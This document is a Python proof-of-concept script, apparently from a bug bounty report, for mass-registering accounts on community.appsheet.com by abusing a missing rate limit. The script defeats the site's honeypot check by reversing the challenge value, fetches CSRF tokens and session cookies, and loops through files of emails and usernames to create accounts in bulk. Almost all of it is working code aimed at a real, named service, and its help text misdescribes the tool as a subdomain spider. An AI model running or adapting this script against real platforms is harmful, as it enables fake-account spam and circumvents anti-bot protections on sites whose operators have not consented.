Create 300 account at https://community.appsheet.com

PoC.py

import requests
import re
import argparse
import time

parser = argparse.ArgumentParser("No rate limit in registration functionality in https://community.appsheet.com/",
    description='description:Tool that spider subdomains and extract endpoints')
parser.add_argument('-e', help='file contain emails')
parser.add_argument('-u', help='file contain usernames')
parser.add_argument('-p', help='password for accounts')
args = parser.parse_args()


def rigesterer(email, username):
	headers1 = {'Host': 'community.appsheet.com','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','Accept': 'application/json, text/javascript, */*; q=0.01','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','X-CSRF-Token': 'undefined','Discourse-Present': 'true', 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close'}
	req1 = requests.get("https://community.appsheet.com/session/hp.json", headers=headers1, verify=False)
	session1 = req1.headers['set-cookie']
	value = re.findall('"value":"(.*)","challenge"',req1.text)
	value = value[0]
	challenge = re.findall('"challenge":"(.*)",',req1.text)
	challenge = challenge[0][::-1]
	
	headers2 = {'Host': 'community.appsheet.com','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','Accept': 'application/json, text/javascript, */*; q=0.01','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','X-CSRF-Token': 'undefined','Discourse-Present': 'true','X-Requested-With': 'XMLHttpRequest','Connection': 'close','Cookie': session1}
	req2 = requests.get("https://community.appsheet.com/session/csrf", headers=headers2, verify=False)
	csrf = re.findall('"csrf":"(.*)"',req2.text)
	csrf = csrf[0]
	session2 = req2.headers['set-cookie']
	
	headers3 = {'Host': 'community.appsheet.com','User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','Accept': '*/*','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','X-CSRF-Token': csrf,'X-Requested-With': 'XMLHttpRequest','Origin': 'https://community.appsheet.com','Connection': 'close','Cookie': session2}
	params = {'email': email,'password': args.p, 'username': username,'password_confirmation': value,'challenge': challenge,'user_fields%5B3%5D':'','timezone': 'Africa%2FCairo'}
	req3 = requests.post("https://community.appsheet.com/u",headers=headers3,data=params, verify=False)
	time.sleep(1)

def logo():
	print("""

 ██████╗ ███╗   ███╗ █████╗ ██████╗     ██╗  ██╗ █████╗ ███████╗██╗  ██╗███████╗███╗   ███╗                                
██╔═══██╗████╗ ████║██╔══██╗██╔══██╗    ██║  ██║██╔══██╗██╔════╝██║  ██║██╔════╝████╗ ████║                                
██║   ██║██╔████╔██║███████║██████╔╝    ███████║███████║███████╗███████║█████╗  ██╔████╔██║                                
██║   ██║██║╚██╔╝██║██╔══██║██╔══██╗    ██╔══██║██╔══██║╚════██║██╔══██║██╔══╝  ██║╚██╔╝██║                                
╚██████╔╝██║ ╚═╝ ██║██║  ██║██║  ██║    ██║  ██║██║  ██║███████║██║  ██║███████╗██║ ╚═╝ ██║                                
 ╚═════╝ ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝    ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ 

 	Twitter:@OmarHashem666

 """)


if __name__ == '__main__':
	if args.e is not None and args.u is not None and args.p is not None:
		logo()
		email_file = open(args.e).readlines()
		emails = []
		counter = 0

		for email in email_file:
			emails.append(email.strip())
			counter = counter + 1
		username_file = open(args.u).readlines()

		usernames = []
		for username in username_file:
			usernames.append(username.strip())

		for i in range(counter):
			rigesterer(emails[i], usernames[i])
	else:
		logo()
		parser.print_help()